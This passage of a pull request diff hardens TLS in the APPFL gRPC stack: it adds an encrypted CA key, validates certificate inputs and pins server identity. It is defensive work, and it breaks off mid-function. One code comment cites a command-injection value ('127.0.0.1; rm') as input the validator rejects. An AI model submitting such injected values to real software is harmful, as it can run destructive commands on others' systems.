### PR TITLE
Encrypt CA key, validate cert subject inputs, enforce server identity on gRPC TLS

### DIFF
--- a/docs/tutorials/examples_ssl.rst
+++ b/docs/tutorials/examples_ssl.rst
@@ -8,36 +8,49 @@ Example: SSL Encrypted gRPC Communication
 Generate SSL Certificates and Keys
 -----------------------------------
 
-.. note::
-    You need to have ``openssl`` installed on your machine to generate the SSL certificates and keys.
+In this example, we show how to enable SSL encrypted gRPC communication between the FL server and the clients. APPFL provides a command line interface, ``appfl-setup-ssl``, to generate the SSL certificates and keys for the server and the clients in the user-specific directory. The generator is implemented directly with the :mod:`cryptography` library (no ``openssl`` binary required).
 
-In this example, we show how to enable SSL encrypted gRPC communication between the FL server and the clients. APPFL provides a command line interface, ``appfl-setup-ssl``, to generate the SSL certificates and keys for the server and the clients in the user-specific directory. The following block of code shows what information is needed to generate the SSL certificates and keys:
+The following block of code shows what information is needed to generate the SSL certificates and keys:
 
 - The absolute path of the directory where the SSL certificate and private key will be stored, by default they are stored in ``~/.appfl/ssl``.
 - Optional country code, state, organization. User can feel free to press Enter to use the default values.
-- The DNS and IP address of the server. By default, the DNS is set to ``localhost`` and the IP address is set to ``127.0.0.1``.
+- The DNS name(s) and IP address(es) of the server (comma-separated). By default, the DNS is set to ``localhost`` and the IP address is set to ``127.0.0.1``. A single cert can cover several names — for example ``appfl.example.com, alt.example.com, localhost``.
+- A passphrase for the CA private key. The script prompts for it interactively (or reads ``APPFL_CA_PASSPHRASE`` if set). Anyone who reads ``ca.key`` off the disk still needs this passphrase to mint federation-wide certificates.
 
 .. code-block:: bash
 
     $ appfl-setup-ssl
 
     Enter the absolute path of the directory where the SSL certificate and private key will be stored, press Enter to use the default directory /home/.appfl/ssl:
-    Enter Country Code, press Enter to use default 'US':
+    Enter Country Code (2 letters), press Enter to use default 'US':
     Enter State, press Enter to use default 'Illinois':
     Enter Organization (O), press Enter to use default 'APPFL':
-    Enter DNS (DNS.1), press Enter to use default 'localhost':
-    Enter IP, press Enter to use default '127.0.0.1':
-    Certificate request self-signature ok
-    subject=C=US, ST=Illinois, O=APPFL, CN=localhost
-    =============================================================================
-    SSL certificate stored in /home/.appfl/ssl/server.crt
-    SSL private key stored in /home/.appfl/ssl/server.key
+    Enter DNS name(s), comma-separated, press Enter to use default 'localhost':
+    Enter IP address(es), comma-separated, press Enter to use default '127.0.0.1':
+    CA private key passphrase (>= 12 chars, empty = unencrypted): ************
+    Confirm passphrase: ************
+    ==============================================================================
     CA certificate stored in  /home/.appfl/ssl/ca.crt
-    Please copy the CA certificate /home/.appfl/ssl/ca.crt to the client machines
-    =============================================================================
+    CA private key stored in  /home/.appfl/ssl/ca.key (encrypted)
+    Server certificate stored in /home/.appfl/ssl/server.crt
+    Server private key stored in /home/.appfl/ssl/server.key
+    ==============================================================================
+    Copy /home/.appfl/ssl/ca.crt to every client that should trust this federation.
+    On each client, set in the gRPC client communicator config:
+      root_certificate: /home/.appfl/ssl/ca.crt
+      use_ssl: true
+    Pin the server identity (must match a SAN below) using:
+      server_hostname: localhost
+    Subject alternative names on this server cert:
+      DNS: localhost
+      IP:  127.0.0.1
+    ==============================================================================
 
 .. note::
-    When you create a server for distributed clients (i.e. not under the same network), you need to provide the DNS and public IP address of the server.
+    When you create a server for distributed clients (i.e. not under the same network), you need to provide the DNS and public IP address of the server. They will all be encoded as ``SubjectAlternativeName`` entries on the server certificate. Set ``server_hostname`` on each client to whichever entry that client will use to reach the server.
+
+.. note::
+    To run ``appfl-setup-ssl`` non-interactively (CI / containers), set ``APPFL_CA_PASSPHRASE`` in the environment. To deliberately generate an unencrypted CA key (not recommended on shared hosts), set ``APPFL_CA_NO_ENCRYPT=1``.
 
 ``appfl-setup-ssl`` will generate three files needed for SSL encrypted gRPC communication in the specified directory (by default, ``~/.appfl/ssl``):
 
@@ -84,10 +97,18 @@ We use this `client configuration file <https://github.com/APPFL/APPFL/blob/main
             max_message_size: 1048576
             use_ssl: True
             root_certificate: "client_path/ca.crt"
+            server_hostname: localhost  # must match a SAN on the server cert
             use_authenticator: True
             authenticator: "NaiveAuthenticator"
             authenticator_args:
                 auth_token: "A_SECRET_DEMO_TOKEN"
+
+.. note::
+    ``server_hostname`` is required when ``use_ssl: True``. It is the identity
+    the client expects the server to prove, independent of ``server_uri``.
+    Without it, any certificate that chains to the configured CA would be
+    accepted regardless of subject — an attacker who can mint a leaf cert from
+    the same CA could MITM the connection.
 
 Run the Server and Clients
 --------------------------

--- a/examples/resources/configs/mnist/client_1_gloubs_auth.yaml
+++ b/examples/resources/configs/mnist/client_1_gloubs_auth.yaml
@@ -25,6 +25,7 @@ comm_configs:
     max_message_size: 1048576
     use_ssl: True
     root_certificate: "/your-home/.appfl/ssl/ca.crt"
+    server_hostname: localhost  # must match a SAN on the server cert (printed by appfl-setup-ssl)
     use_authenticator: True
     authenticator: "GlobusAuthenticator"
     authenticator_args:

--- a/examples/resources/configs/mnist/client_2_gloubs_auth.yaml
+++ b/examples/resources/configs/mnist/client_2_gloubs_auth.yaml
@@ -25,6 +25,7 @@ comm_configs:
     max_message_size: 1048576
     use_ssl: True
     root_certificate: "/your-home/.appfl/ssl/ca.crt"
+    server_hostname: localhost  # must match a SAN on the server cert (printed by appfl-setup-ssl)
     use_authenticator: True
     authenticator: "GlobusAuthenticator"
     authenticator_args:

--- a/src/appfl/comm/grpc/channel.py
+++ b/src/appfl/comm/grpc/channel.py
@@ -2,11 +2,70 @@
 Auxiliary function to create a secure/insecure gRPC channel.
 """
 
+import ipaddress
+import logging
+import re
+import warnings
+from typing import Optional, Union, Dict, Any
+from urllib.parse import urlsplit
+
 import grpc
 from .auth import APPFLAuthMetadataProvider
 from .utils import load_credential_from_file
-from typing import Optional, Union, Dict, Any
 from appfl.misc.utils import get_appfl_authenticator
+
+_logger = logging.getLogger(__name__)
+
+# RFC 1123-ish hostname: dot-separated labels, each label 1-63 chars, total
+# <=253 chars, no leading/trailing dash. Underscores rejected.
+_RE_HOSTNAME = re.compile(
+    r"^(?=.{1,253}$)"
+    r"(?:[A-Za-z0-9](?:[A-Za-z0-9\-]{0,61}[A-Za-z0-9])?)"
+    r"(?:\.(?:[A-Za-z0-9](?:[A-Za-z0-9\-]{0,61}[A-Za-z0-9])?))*$"
+)
+
+
+def _is_ip_literal(host: str) -> bool:
+    try:
+        ipaddress.ip_address(host)
+        return True
+    except ValueError:
+        return False
+
+
+def _uri_host(server_uri: str) -> Optional[str]:
+    """Return the host part of ``server_uri`` (``host:port`` or scheme URL),
+    or ``None`` if it can't be parsed."""
+    if not server_uri:
+        return None
+    target = server_uri
+    if "://" not in target:
+        target = "//" + target
+    try:
+        parts = urlsplit(target)
+    except ValueError:
+        return None
+    return parts.hostname or None
+
+
+def _validate_server_hostname(value: str) -> None:
+    """Reject obviously bad ``server_hostname`` values at startup.
+
+    Accept: DNS hostname (RFC-1123-ish), IPv4 literal, IPv6 literal.
+    Reject: empty, wildcard (``*.foo``), shell metacharacters, whitespace.
+    """
+    if not value:
+        raise ValueError("server_hostname must be non-empty")
+    if value.startswith("*"):
+        raise ValueError(
+            f"server_hostname {value!r} is a wildcard; pin a concrete identity"
+        )
+    if _is_ip_literal(value):
+        return
+    if not _RE_HOSTNAME.match(value):
+        raise ValueError(
+            f"server_hostname {value!r} is not a valid DNS hostname or IP literal"
+        )
 
 
 def create_grpc_channel(
@@ -18,6 +77,9 @@ def create_grpc_channel(
     authenticator: Optional[str] = None,
     authenticator_args: Dict[str, Any] = {},
     max_message_size: int = 2 * 1024 * 1024,
+    server_hostname: Optional[str] = None,
+    insecure_skip_server_identity_check: bool = False,
+    allow_uri_hostname_mismatch: bool = False,
     **kwargs,
 ) -> grpc.Channel:
     """
@@ -30,6 +92,17 @@ def create_grpc_channel(
     :param authenticator: The name of the authenticator to use for authenticating the client in each RPC.
     :param authenticator_args: The arguments to pass to the authenticator.
     :param max_message_size: The maximum message size in bytes.
+    :param server_hostname: The expected server identity. Required when ``use_ssl=True``
+        unless ``insecure_skip_server_identity_check=True`` is also set. The value
+        must appear as a DNS or IP SubjectAlternativeName entry on the server cert.
+    :param insecure_skip_server_identity_check: If ``True``, do not pin the server
+        identity. The chain is still verified against ``root_certificate``, but any
+        cert chaining to that CA will be accepted regardless of SAN. Loud warning is
+        emitted; never set in production.
+    :param allow_uri_hostname_mismatch: If ``True``, accept a ``server_hostname``
+        that differs from the DNS authority of ``server_uri``. Defaults to ``False``
+        to catch the common "URI points at a load balancer, cert is for the
+        backend" misconfiguration at startup instead of attack time.
     :return: The created gRPC channel.
     """
     assert not (use_authenticator and not use_ssl), (
@@ -45,6 +118,43 @@ def create_grpc_channel(
         ("grpc.http2.min_time_between_pings_ms", 10000),
     ]
     if use_ssl:
+        if not server_hostname and not insecure_skip_server_identity_check:
+            raise ValueError(
+                "create_grpc_channel: server_hostname is required when "
+                "use_ssl=True. Pin the value that appears as a "
+                "SubjectAlternativeName on the server certificate (printed "
+                "by appfl-setup-ssl). To intentionally skip the identity "
+                "check, set insecure_skip_server_identity_check=True."
+            )
+
+        if server_hostname:
+            _validate_server_hostname(server_hostname)
+            uri_host = _uri_host(server_uri)
+            if (
+                uri_host
+                and not _is_ip_literal(uri_host)
+                and uri_host != server_hostname
+                and not allow_uri_hostname_mismatch
+            ):
+                raise ValueError(
+                    f"create_grpc_channel: server_uri host {uri_host!r} does "
+                    f"not match server_hostname {server_hostname!r}. If this "
+                    "is intentional (for example connecting through a load "
+                    "balancer), set allow_uri_hostname_mismatch=True."
+                )
+            # `ssl_target_name_override` forces the gRPC C-core to verify the
+            # leaf SAN against this value regardless of the URI authority.
+            channel_options.append(("grpc.ssl_target_name_override", server_hostname))
+        else:
+            msg = (
+                "create_grpc_channel: insecure_skip_server_identity_check=True; "
+                "the server certificate's SAN will NOT be verified. Any cert "
+                "chaining to the configured CA will be accepted. Do not use in "
+                "production."
+            )
+            warnings.warn(msg, stacklevel=2)
+            _logger.warning(msg)
+
         if root_certificate is not None:
             if isinstance(root_certificate, str):
                 root_certificate = load_credential_from_file(root_certificate)

--- a/src/appfl/comm/grpc/credentials/ReadME.md
+++ b/src/appfl/comm/grpc/credentials/ReadME.md
@@ -1,16 +1,16 @@
 # SSL/TLS Credentials
 
 This directory used to ship a `localhost.crt` / `localhost.key` / `root.crt`
-trio borrowed from the gRPC examples, intended for local demos. Those
-files have been removed: shipping a private key in a PyPI wheel is a
-supply-chain hazard (every `pip install appfl` user gets the same key on
-disk, and any on-path attacker can MITM `localhost` deployments using the
-matching public certificate).
+trio borrowed from the gRPC examples, intended for local demos. Those files
+have been removed: shipping a private key in a PyPI wheel is a supply-chain
+hazard (every `pip install appfl` user gets the same key on disk, and any
+on-path attacker can MITM `localhost` deployments using the matching public
+certificate).
 
 ## Generating credentials
 
-Use the bundled console script to generate a fresh local CA and a
-server certificate signed by it:
+Use the bundled console script to generate a fresh local CA and a server
+certificate signed by it:
 
 ```bash
 appfl-setup-ssl
@@ -21,25 +21,74 @@ The script writes (by default) to `~/.appfl/ssl/`:
 - `ca.key` and `ca.crt` — the CA private key and self-signed certificate.
   Keep `ca.key` private; ship `ca.crt` to every client that should trust
   this federation.
-- `server.key` and `server.crt` — the server's private key and the
-  CA-signed certificate to present on the wire.
+- `server.key` and `server.crt` — the server's private key and the CA-signed
+  certificate to present on the wire.
 
-Then point your APPFL config at those paths:
+The CA private key is **encrypted with a passphrase** by default. The script
+prompts for the passphrase interactively and applies AES-256 / PBKDF2 via
+PKCS#8 (`cryptography`'s `BestAvailableEncryption`). Anyone who reads
+`ca.key` off the disk still needs the passphrase to forge certificates.
+
+### Scripted / CI use
+
+Set `APPFL_CA_PASSPHRASE` in the environment to suppress the prompt:
+
+```bash
+APPFL_CA_PASSPHRASE='use-a-real-passphrase' appfl-setup-ssl < answers.txt
+```
+
+To deliberately generate an unencrypted CA key (CI-only, do not do this on
+shared hosts), set `APPFL_CA_NO_ENCRYPT=1`. The script writes a loud WARNING
+banner to stderr and refuses to proceed without an interactive "yes"
+confirmation when run on a TTY.
+
+### Multi-SAN certificates
+
+The DNS and IP prompts accept comma-separated lists, so one server cert can
+cover the bind IP, the hostname, and `localhost` at once:
+
+```text
+Enter DNS name(s), comma-separated, press Enter to use default 'localhost': appfl.example.com, internal-lb.example.com, localhost
+Enter IP address(es), comma-separated, press Enter to use default '127.0.0.1': 10.0.0.5, 127.0.0.1
+```
+
+After generation the script prints the `server_hostname` value clients must
+pin (the first DNS entry) and the full list of SAN entries the cert covers.
+
+## Pointing APPFL at the generated paths
 
 ```yaml
 server:
   server_certificate_key: /home/<you>/.appfl/ssl/server.key
   server_certificate:     /home/<you>/.appfl/ssl/server.crt
 client:
-  root_certificates:      /home/<you>/.appfl/ssl/ca.crt
+  use_ssl: true
+  root_certificate:       /home/<you>/.appfl/ssl/ca.crt
+  server_hostname:        appfl.example.com   # must match a SAN on server.crt
 ```
+
+`server_hostname` is **required** when `use_ssl: true`. It is the identity
+the client expects the server to prove, independent of the URI the client
+dials. Without it, any certificate that chains to the configured CA would be
+accepted regardless of subject — an attacker who can mint a leaf cert from
+the same CA could MITM the connection.
 
 In code, paths are loaded via `appfl.comm.grpc.load_credential_from_file`.
 
 ## Production deployments
 
-`appfl-setup-ssl` is a convenience for self-signed local CAs. For
-production, mint server certificates from a real CA the participating
-clients already trust (your institutional PKI, Let's Encrypt for an
-internet-facing endpoint, an AWS PCA, etc.) and configure the same fields
-to point at those PEM files.
+`appfl-setup-ssl` is a convenience for self-signed local CAs. For production,
+mint server certificates from a real CA the participating clients already
+trust (your institutional PKI, Let's Encrypt for an internet-facing endpoint,
+an AWS PCA, etc.) and configure the same fields to point at those PEM files.
+Set `server_hostname` to the SAN you expect to see on the production cert.
+
+## Rotating the CA
+
+To rotate the CA (e.g. because `ca.key` was exposed):
+
+1. Run `appfl-setup-ssl` to generate a fresh CA and server cert.
+2. Distribute the new `ca.crt` to every client out of band.
+3. Restart the server with the new `server.key` / `server.crt`.
+
+There is no in-band revocation path; rotation is the only remedy.

--- a/src/appfl/comm/grpc/grpc_client_communicator.py
+++ b/src/appfl/comm/grpc/grpc_client_communicator.py
@@ -57,6 +57,9 @@ class GRPCClientCommunicator:
         authenticator: Optional[str] = None,
         authenticator_args: Dict[str, Any] = {},
         max_message_size: int = 2 * 1024 * 1024,
+        server_hostname: Optional[str] = None,
+        insecure_skip_server_identity_check: bool = False,
+        allow_uri_hostname_mismatch: bool = False,
         logger: Optional[Any] = None,
         **kwargs,
     ):
@@ -71,6 +74,12 @@ class GRPCClientCommunicator:
         :param authenticator: The name of the authenticator to use for authenticating the client in each RPC.
         :param authenticator_args: The arguments to pass to the authenticator.
         :param max_message_size: The maximum message size in bytes.
+        :param server_hostname: Pinned server identity for TLS hostname verification.
+            Required when ``use_ssl=True``; must match a SAN entry on the server cert.
+        :param insecure_skip_server_identity_check: Opt-out of SAN verification (still
+            verifies the chain). Emits a warning; never set in production.
+        :param allow_uri_hostname_mismatch: Permit ``server_uri`` to use a DNS host
+            that differs from ``server_hostname`` (e.g. load-balancer fronting).
         """
         self.client_id = client_id
         self.logger = logger
@@ -92,6 +101,9 @@ class GRPCClientCommunicator:
             authenticator=authenticator,
             authenticator_args=authenticator_args,
             max_message_size=max_message_size,
+            server_hostname=server_hostname,
+            insecure_skip_server_identity_check=insecure_skip_server_identity_check,
+            allow_uri_hostname_mismatch=allow_uri_hostname_mismatch,
         )
         grpc.channel_ready_future(channel).result(timeout=3600)
         self.stub = GRPCCommunicatorStub(channel)

--- a/src/appfl/comm/grpc/serve.py
+++ b/src/appfl/comm/grpc/serve.py
@@ -2,14 +2,65 @@
 Serve a gRPC server
 """
 
+import ipaddress
+import logging
 import time
+import warnings
 import grpc
 from concurrent import futures
+from .channel import _uri_host
 from .grpc_communicator_pb2_grpc import add_GRPCCommunicatorServicer_to_server
 from .utils import load_credential_from_file
 from .auth import APPFLAuthMetadataInterceptor
 from typing import Any, Optional, Union, Dict
 from appfl.misc.utils import get_appfl_authenticator
+
+_logger = logging.getLogger(__name__)
+
+
+def _warn_if_bind_uri_not_covered_by_san(
+    server_uri: str, server_certificate: Union[bytes, str]
+) -> None:
+    """Advisory only — log a WARNING if the bind authority of ``server_uri``
+    is not covered by any DNS or IP SAN entry on the server cert. Clients
+    pinning ``server_hostname`` would fail handshakes in this case."""
+    try:
+        from cryptography import x509  # transitive via grpcio
+    except ImportError:
+        return
+    try:
+        pem = (
+            server_certificate
+            if isinstance(server_certificate, (bytes, bytearray))
+            else server_certificate.encode()
+        )
+        cert = x509.load_pem_x509_certificate(pem)
+        san_ext = cert.extensions.get_extension_for_class(
+            x509.SubjectAlternativeName
+        ).value
+    except Exception:
+        return
+    uri_host = _uri_host(server_uri)
+    if not uri_host:
+        return
+    dns_names = set(san_ext.get_values_for_type(x509.DNSName))
+    ip_values = {str(ip) for ip in san_ext.get_values_for_type(x509.IPAddress)}
+    try:
+        ip_canonical = str(ipaddress.ip_address(uri_host))
+        is_ip = True
+    except ValueError:
+        ip_canonical = uri_host
+        is_ip = False
+    covered = (uri_host in dns_names) or (is_ip and ip_canonical in ip_values)
+    if not covered:
+        msg = (
+            f"serve: bind URI host {uri_host!r} is not covered by any SAN on "
+            f"the server certificate (DNS={sorted(dns_names)}, "
+            f"IP={sorted(ip_values)}). Clients pinning server_hostname to "
+            "this value will reject the handshake."
+        )
+        warnings.warn(msg, stacklevel=2)
+        _logger.warning(msg)
 
 
 def serve(
@@ -90,6 +141,7 @@ def serve(
             ),
             root_certificates=ca_certificate,
         )
+        _warn_if_bind_uri_not_covered_by_san(server_uri, server_certificate)
         server.add_secure_port(server_uri, credentials)
     else:
         server.add_insecure_port(server_uri)

--- a/src/appfl/comm/grpc/setup_ssl.py
+++ b/src/appfl/comm/grpc/setup_ssl.py
@@ -1,20 +1,70 @@
+"""Generate a self-signed CA and a CA-signed server certificate for an APPFL
+gRPC deployment.
+
+This module is the implementation of the ``appfl-setup-ssl`` console script.
+The generator is implemented directly with the :mod:`cryptography` library
+rather than by templating a Bash script that shells out to ``openssl``. The
+direct approach removes three classes of risk that the previous template had:
+
+* Shell metacharacters in the operator-supplied subject fields (``C``, ``ST``,
+  ``ORG``, ``DNS``, ``IP``) cannot break out of the ``openssl`` argv because
+  there is no shell — every value flows through a typed :mod:`cryptography`
+  call.
+* The CA private key is encrypted with a passphrase by default. Reading
+  ``ca.key`` off a shared filesystem is no longer sufficient to forge certs
+  for the federation.
+* The wizard accepts comma-separated DNS and IP inputs, so a single server
+  certificate can cover the bind IP, the hostname, and a localhost alias at
+  once. The expected ``server_hostname`` values that clients must pin are
+  printed at the end of the run.
+"""
+
+from __future__ import annotations
+
+import datetime
+import getpass
+import ipaddress
 import os
 import pathlib
 import re
-import subprocess
+import stat
+import sys
+from typing import List, Optional, Tuple
+
+from cryptography import x509
+from cryptography.hazmat.primitives import hashes, serialization
+from cryptography.hazmat.primitives.asymmetric import rsa
+from cryptography.x509.oid import NameOID
 
 _SAFE_PATH_RE = re.compile(r"^/[A-Za-z0-9_./-]*$")
 
+# ISO 3166-1 alpha-2 country code (two uppercase letters).
+_RE_COUNTRY = re.compile(r"^[A-Za-z]{2}$")
 
-def setup_ssl():
-    """
-    Command line interface for creating SSL certificate signed by a private
-    certificate authority (CA), and storing the certificate and private key
-    in the specified directory.
-    """
-    # Prompt user for the directory to store the SSL certificate and private key
+# State / province / organisation: printable ASCII, no shell metachars, no
+# newlines, no `[` (which could otherwise inject an X.509 attribute split).
+_RE_NAME = re.compile(r"^[A-Za-z0-9 .,'_\-]{1,64}$")
+
+# RFC 1123-ish hostname: dot-separated labels, each label 1-63 chars, total
+# <=253 chars, no leading/trailing dash on any label. Underscores are rejected.
+_RE_DNS = re.compile(
+    r"^(?=.{1,253}$)"
+    r"(?:[A-Za-z0-9](?:[A-Za-z0-9\-]{0,61}[A-Za-z0-9])?)"
+    r"(?:\.(?:[A-Za-z0-9](?:[A-Za-z0-9\-]{0,61}[A-Za-z0-9])?))*$"
+)
+
+# Minimum CA passphrase length when prompted interactively. Operators on the
+# scripted path (env var) can set whatever they want.
+_MIN_PASSPHRASE_LEN = 12
+
+# Validity windows.
+_CA_VALIDITY_DAYS = 3650
+_LEAF_VALIDITY_DAYS = 825
+
+
+def _prompt_ssl_dir() -> str:
+    default_ssl_dir = os.path.join(pathlib.Path.home(), ".appfl", "ssl")
     while True:
-        default_ssl_dir = os.path.join(pathlib.Path.home(), ".appfl", "ssl")
         ssl_dir = input(
             f"Enter the absolute path of the directory where the SSL certificate and private key will be stored, press Enter to use the default directory {default_ssl_dir}: "
         )
@@ -28,126 +78,455 @@ def setup_ssl():
             )
             continue
         try:
-            if not os.path.exists(ssl_dir):
-                pathlib.Path(ssl_dir).mkdir(parents=True, exist_ok=True)
-            if not os.path.isdir(ssl_dir):
-                raise NotADirectoryError(ssl_dir)
-            for f in os.listdir(ssl_dir):
-                os.remove(os.path.join(ssl_dir, f))
+            _ensure_ssl_dir(ssl_dir)
         except OSError as e:
             print(f"Invalid directory ({e}), please try again")
             continue
-        break
+        return ssl_dir
 
-    # Default values
+
+def _ensure_ssl_dir(ssl_dir: str) -> None:
+    """Create ``ssl_dir`` if missing, refuse symlinks and group/world writes,
+    and clear any pre-existing regular files. Mode is forced to 0o700."""
+    if os.path.lexists(ssl_dir):
+        # Reject any symlink at the target path so a co-tenant can't redirect
+        # the writes via a pre-positioned symlink.
+        st = os.lstat(ssl_dir)
+        if stat.S_ISLNK(st.st_mode):
+            raise OSError(
+                f"{ssl_dir} is a symlink; refusing to follow it. "
+                "Remove the symlink and try again."
+            )
+        if not stat.S_ISDIR(st.st_mode):
+            raise NotADirectoryError(ssl_dir)
+        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
+            raise OSError(
+                f"{ssl_dir} is group- or world-writable; refusing to use it. "
+                "Run `chmod 700` on the directory and try again."
+            )
+        # Clear leftover files, but refuse to follow symlinks inside.
+        for name in os.listdir(ssl_dir):
+            entry = os.path.join(ssl_dir, name)
+            entry_st = os.lstat(entry)
+            if stat.S_ISDIR(entry_st.st_mode) and not stat.S_ISLNK(entry_st.st_mode):
+                # Don't recurse into subdirectories — operator put them there.
+                continue
+            os.unlink(entry)
+    else:
+        os.makedirs(ssl_dir, mode=0o700, exist_ok=False)
+    # `mkdir` honours umask, so chmod explicitly.
+    os.chmod(ssl_dir, 0o700)
+
+
+def _validate(field: str, value: str, pattern: re.Pattern) -> str:
+    value = value.strip()
+    if not pattern.match(value):
+        raise ValueError(
+            f"Invalid {field} ({value!r}): must match {pattern.pattern!r}. "
+            "Newlines, quotes, and shell metacharacters are rejected."
+        )
+    return value
+
+
+def _validate_country(value: str) -> str:
+    return _validate("Country (C)", value, _RE_COUNTRY).upper()
+
+
+def _validate_name(field: str, value: str) -> str:
+    return _validate(field, value, _RE_NAME)
+
+
+def _validate_dns(value: str) -> str:
+    return _validate("DNS", value, _RE_DNS)
+
+
+def _validate_ip(value: str) -> str:
+    # `ipaddress.ip_address` rejects everything the regex would have to
+    # enumerate manually: "127.0.0.1; rm", "999.999.999.999", newlines, etc.
+    value = value.strip()
+    return str(ipaddress.ip_address(value))
+
+
+def _prompt_validated(prompt: str, default: str, validator) -> str:
+    """Interactively prompt until ``validator`` accepts the value. The default
+    is used on a bare Enter and is also validated (so the wizard fails loudly
+    if a hard-coded default ever becomes invalid)."""
+    while True:
+        raw = input(prompt) or default
+        try:
+            return validator(raw)
+        except ValueError as e:
+            print(f"  {e}. Please try again.")
+
+
+def _split_csv(raw: str) -> List[str]:
+    """Split a comma-separated input into trimmed non-empty parts."""
+    return [part.strip() for part in raw.split(",") if part.strip()]
+
+
+def _prompt_san_dns(default: str) -> List[str]:
+    while True:
+        raw = (
+            input(
+                f"Enter DNS name(s), comma-separated, press Enter to use default '{default}': "
+            )
+            or default
+        )
+        parts = _split_csv(raw)
+        if not parts:
+            print("  At least one DNS name is required. Please try again.")
+            continue
+        try:
+            return [_validate_dns(p) for p in parts]
+        except ValueError as e:
+            print(f"  {e}. Please try again.")
+
+
+def _prompt_san_ip(default: str) -> List[str]:
+    while True:
+        raw = (
+            input(
+                f"Enter IP address(es), comma-separated, press Enter to use default '{default}': "
+            )
+            or default
+        )
+        parts = _split_csv(raw)
+        if not parts:
+            print("  At least one IP address is required. Please try again.")
+            continue
+        try:
+            return [_validate_ip(p) for p in parts]
+        except ValueError as e:
+            print(f"  {e}. Please try again.")
+
+
+def _acquire_ca_passphrase() -> Optional[bytes]:
+    """Return the CA private-key passphrase as bytes, or ``None`` if the
+    operator explicitly opted out of encryption.
+
+    Order of precedence:
+
+    1. ``APPFL_CA_PASSPHRASE`` env var (scripted / CI path).
+    2. Interactive double-prompt via :func:`getpass.getpass` when stdin is a
+       TTY.
+    3. ``APPFL_CA_NO_ENCRYPT=1`` env var (loud opt-out for unattended runs).
+    """
+    env_pw = os.environ.get("APPFL_CA_PASSPHRASE")
+    if env_pw:
+        return env_pw.encode("utf-8")
+
+    no_encrypt = os.environ.get("APPFL_CA_NO_ENCRYPT", "").strip() in (
+        "1",
+        "true",
+        "True",
+        "yes",
+    )
+
+    if not sys.stdin.isatty():
+        if no_encrypt:
+            _warn_unencrypted_ca_key()
+            return None
+        raise RuntimeError(
+            "appfl-setup-ssl: refusing to generate an unencrypted CA private "
+            "key in a non-interactive shell. Set APPFL_CA_PASSPHRASE=... to "
+            "encrypt it, or APPFL_CA_NO_ENCRYPT=1 to acknowledge the risk."
+        )
+
+    for _ in range(3):
+        first = getpass.getpass(
+            f"CA private key passphrase (>= {_MIN_PASSPHRASE_LEN} chars, empty = unencrypted): "
+        )
+        if first == "":
+            if no_encrypt or _confirm_unencrypted_interactive():
+                _warn_unencrypted_ca_key()
+                return None
+            continue
+        if len(first) < _MIN_PASSPHRASE_LEN:
+            print(
+                f"  Passphrase too short (need >= {_MIN_PASSPHRASE_LEN} chars). "
+                "Please try again."
+            )
+            continue
+        second = getpass.getpass("Confirm passphrase: ")
+        if first != second:
+            print("  Passphrases did not match. Please try again.")
+            continue
+        return first.encode("utf-8")
+
+    raise RuntimeError(
+        "appfl-setup-ssl: gave up after three failed passphrase attempts."
+    )
+
+
+def _confirm_unencrypted_interactive() -> bool:
+    print(
+        "\n  WARNING: an unencrypted CA private key is the federation's root "
+        "of trust on disk.\n"
+        "  Anyone who reads ca.key can mint server or client certificates for "
+        "any identity.\n"
+    )
+    answer = input("  Type 'yes' to proceed without encryption: ").strip().lower()
+    return answer == "yes"
+
+
+def _warn_unencrypted_ca_key() -> None:
+    banner = "!" * 72
+    print(banner, file=sys.stderr)
+    print(
+        "WARNING: ca.key is being written UNENCRYPTED. Anyone who can read "
+        "this file can mint certificates for any identity in the federation.",
+        file=sys.stderr,
+    )
+    print(
+        "To encrypt an existing key after the fact:\n"
+        "    openssl pkcs8 -topk8 -v2 aes-256-cbc -in ca.key -out ca.key.enc\n"
+        "    mv ca.key.enc ca.key",
+        file=sys.stderr,
+    )
+    print(banner, file=sys.stderr)
+
+
+def _build_name(country: str, state: str, org: str, common_name: str) -> x509.Name:
+    return x509.Name(
+        [
+            x509.NameAttribute(NameOID.COUNTRY_NAME, country),
+            x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, state),
+            x509.NameAttribute(NameOID.ORGANIZATION_NAME, org),
+            x509.NameAttribute(NameOID.COMMON_NAME, common_name),
+        ]
+    )
+
+
+def _build_san(
+    dns_names: List[str], ip_addresses: List[str]
+) -> x509.SubjectAlternativeName:
+    entries: List[x509.GeneralName] = [x509.DNSName(d) for d in dns_names]
+    entries.extend(x509.IPAddress(ipaddress.ip_address(ip)) for ip in ip_addresses)
+    return x509.SubjectAlternativeName(entries)
+
+
+def _utcnow() -> datetime.datetime:
+    # Backwards-compatible across cryptography versions: aware UTC datetime
+    # is required by current cryptography releases and accepted by older ones.
+    return datetime.datetime.now(datetime.timezone.utc)
+
+
+def _generate_ca(
+    name: x509.Name, key_size: int = 4096
+) -> Tuple[rsa.RSAPrivateKey, x509.Certificate]:
+    key = rsa.generate_private_key(public_exponent=65537, key_size=key_size)
+    now = _utcnow()
+    cert = (
+        x509.CertificateBuilder()
+        .subject_name(name)
+        .issuer_name(name)
+        .public_key(key.public_key())
+        .serial_number(x509.random_serial_number())
+        .not_valid_before(now - datetime.timedelta(minutes=1))
+        .not_valid_after(now + datetime.timedelta(days=_CA_VALIDITY_DAYS))
+        .add_extension(x509.BasicConstraints(ca=True, path_length=0), critical=True)
+        .add_extension(
+            x509.KeyUsage(
+                digital_signature=False,
+                content_commitment=False,
+                key_encipherment=False,
+                data_encipherment=False,
+                key_agreement=False,
+                key_cert_sign=True,
+                crl_sign=True,
+                encipher_only=False,
+                decipher_only=False,
+            ),
+            critical=True,
+        )
+        .add_extension(
+            x509.SubjectKeyIdentifier.from_public_key(key.public_key()),
+            critical=False,
+        )
+        .sign(private_key=key, algorithm=hashes.SHA256())
+    )
+    return key, cert
+
+
+def _generate_server_cert(
+    *,
+    ca_key: rsa.RSAPrivateKey,
+    ca_cert: x509.Certificate,
+    subject: x509.Name,
+    san: x509.SubjectAlternativeName,
+    key_size: int = 4096,
+) -> Tuple[rsa.RSAPrivateKey, x509.Certificate]:
+    key = rsa.generate_private_key(public_exponent=65537, key_size=key_size)
+    now = _utcnow()
+    cert = (
+        x509.CertificateBuilder()
+        .subject_name(subject)
+        .issuer_name(ca_cert.subject)
+        .public_key(key.public_key())
+        .serial_number(x509.random_serial_number())
+        .not_valid_before(now - datetime.timedelta(minutes=1))
+        .not_valid_after(now + datetime.timedelta(days=_LEAF_VALIDITY_DAYS))
+        .add_extension(x509.BasicConstraints(ca=False, path_length=None), critical=True)
+        .add_extension(
+            x509.KeyUsage(
